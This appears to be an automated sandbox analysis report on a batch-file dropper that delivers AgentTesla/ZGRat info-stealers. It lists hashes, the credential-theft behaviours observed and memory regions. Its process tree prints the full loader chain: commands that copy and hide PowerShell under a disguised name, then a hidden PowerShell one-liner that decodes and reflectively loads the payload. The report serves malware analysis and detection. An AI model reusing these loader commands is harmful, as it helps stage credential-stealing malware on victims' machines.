Analysis

  • max time kernel
    126s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240419-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    02/05/2024, 01:13

General

  • Target

    PO.xlsxm.dr.bat

  • Size

    2.9MB

  • MD5

    a266a061c002211e274caa234aed8c4f

  • SHA1

    9d517f1bac79fe71fc849905331ff7f10ac51a4e

  • SHA256

    c1bcceda8e24feed7019bb01a0b147661a01b23cae8a54d2a6fc8935bf1bd7cb

  • SHA512

    3fcca48852732f8f3a31999af7ea83883e44ffe5c90f8e417010c82af5caa4fdaed3a3110926f66cd50927fe0b7b3e967d6163e4584cc746a19ba51cbdee55c4

  • SSDEEP

    49152:+az/pgAObh21hpmsU1uRkGgL3razanTMx2DSbCXc7UnW92:I

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Detect ZGRat V1 34 IoCs
  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes so that the file is not shown in Explorer and similar tools.

  • Executes dropped EXE 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk, where infostealers often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4140
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo F "
      2⤵
        PID:1928
      • C:\Windows\system32\xcopy.exe
        xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat.Pxi
        2⤵
          PID:1700
        • C:\Windows\system32\attrib.exe
          attrib +s +h C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat.Pxi
          2⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:1684
        • C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat.Pxi
          C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat.Pxi -WindowStyle hidden -command "$Udydfldga = Get-Content 'C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat' | select-object -Last 1; $Eviptzvmy = [System.Convert]::FromBase64String($Udydfldga);$Ebawdvtqvk = New-Object System.IO.MemoryStream( , $Eviptzvmy );$Dlbpv = New-Object System.IO.MemoryStream;$Maplsau = New-Object System.IO.Compression.GzipStream $Ebawdvtqvk, ([IO.Compression.CompressionMode]::Decompress);$Maplsau.CopyTo( $Dlbpv );$Maplsau.Close();$Ebawdvtqvk.Close();[byte[]] $Eviptzvmy = $Dlbpv.ToArray();[Array]::Reverse($Eviptzvmy); $Jwbidbkxfb = [System.Threading.Thread]::GetDomain().Load($Eviptzvmy); $Gegworgxk = $Jwbidbkxfb.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5056
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:4080

      Network

            MITRE ATT&CK Enterprise v15

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat.Pxi

              Filesize

              423KB

              MD5

              c32ca4acfcc635ec1ea6ed8a34df5fac

              SHA1

              f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

              SHA256

              73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

              SHA512

              6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ll2inl4g.cpr.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • memory/4080-4922-0x0000000000400000-0x0000000000442000-memory.dmp

              Filesize

              264KB

            • memory/4080-4923-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB

            • memory/4080-4924-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB

            • memory/4080-4927-0x0000000006700000-0x0000000006750000-memory.dmp

              Filesize

              320KB

            • memory/4080-4929-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB

            • memory/4080-4928-0x00000000069A0000-0x00000000069AA000-memory.dmp

              Filesize

              40KB

            • memory/5056-74-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-70-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-9-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB

            • memory/5056-10-0x00000000059A0000-0x00000000059C2000-memory.dmp

              Filesize

              136KB

            • memory/5056-11-0x0000000005A40000-0x0000000005AA6000-memory.dmp

              Filesize

              408KB

            • memory/5056-12-0x0000000006100000-0x0000000006166000-memory.dmp

              Filesize

              408KB

            • memory/5056-22-0x0000000006170000-0x00000000064C4000-memory.dmp

              Filesize

              3.3MB

            • memory/5056-24-0x00000000068F0000-0x000000000693C000-memory.dmp

              Filesize

              304KB

            • memory/5056-23-0x0000000006840000-0x000000000685E000-memory.dmp

              Filesize

              120KB

            • memory/5056-25-0x0000000007920000-0x00000000079B6000-memory.dmp

              Filesize

              600KB

            • memory/5056-27-0x0000000006DF0000-0x0000000006E12000-memory.dmp

              Filesize

              136KB

            • memory/5056-26-0x0000000006D80000-0x0000000006D9A000-memory.dmp

              Filesize

              104KB

            • memory/5056-28-0x0000000007F70000-0x0000000008514000-memory.dmp

              Filesize

              5.6MB

            • memory/5056-29-0x0000000008BA0000-0x000000000921A000-memory.dmp

              Filesize

              6.5MB

            • memory/5056-30-0x0000000007BC0000-0x0000000007E02000-memory.dmp

              Filesize

              2.3MB

            • memory/5056-31-0x0000000008520000-0x0000000008750000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-32-0x00000000087F0000-0x0000000008882000-memory.dmp

              Filesize

              584KB

            • memory/5056-36-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-34-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-42-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-40-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-38-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-33-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-66-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-7-0x0000000005AD0000-0x00000000060F8000-memory.dmp

              Filesize

              6.2MB

            • memory/5056-80-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-78-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-76-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-72-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-8-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB

            • memory/5056-68-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-64-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-62-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-60-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-58-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-56-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-54-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-52-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-51-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-48-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-46-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-45-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-96-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-94-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-86-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-84-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-82-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-92-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-90-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-88-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-4914-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB

            • memory/5056-4916-0x0000000008970000-0x00000000089BC000-memory.dmp

              Filesize

              304KB

            • memory/5056-4915-0x0000000008900000-0x000000000896C000-memory.dmp

              Filesize

              432KB

            • memory/5056-4917-0x00000000089D0000-0x0000000008A24000-memory.dmp

              Filesize

              336KB

            • memory/5056-6-0x0000000002F30000-0x0000000002F66000-memory.dmp

              Filesize

              216KB

            • memory/5056-5-0x000000007459E000-0x000000007459F000-memory.dmp

              Filesize

              4KB

            • memory/5056-4925-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB